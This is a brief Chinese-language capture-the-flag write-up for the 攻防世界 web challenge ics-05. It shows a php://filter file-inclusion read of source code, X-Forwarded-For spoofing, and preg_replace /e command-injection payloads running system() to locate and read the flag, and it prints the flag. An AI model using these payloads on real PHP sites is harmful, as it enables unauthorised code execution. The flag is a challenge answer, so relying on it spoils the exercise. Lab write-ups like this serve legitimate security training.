攻防世界web进阶区之ics-05

打开题目所给链接攻防世界web进阶区之ics-05一个接一个点,发下只有设备维护中心可以点开攻防世界web进阶区之ics-05单机云平台设备中心会发现URL栏有参数?page=index,本题可能存在文件漏洞,采用php协议,用?page=php://filter/read=convert.base64-encode/resource=index.php查看页面源代码攻防世界web进阶区之ics-05解码后分析原码,可以利用在线解码工具解码,分析代码攻防世界web进阶区之ics-05伪造XFF头来登入系统,payload:/index.php?pat=/123/e&rep=system(“find±iname+flag”)&sub=123
抓包,用burpsuite来设置XFF头
攻防世界web进阶区之ics-05继续执行index.php?pat=/123/e&rep=system(“cd+./s3chahahaDir/flag%26%26ls”)&sub=123,抓包攻防世界web进阶区之ics-05会看见flag.php,接下来执行最后的payload:index.php?pat=/123/e&rep=system(“cat+./s3chahahaDir/flag/flag.php”)&sub=123
攻防世界web进阶区之ics-05就可以得到flag:cyberpeace{d30d0f91047ee7e7763cdd65206cbff7}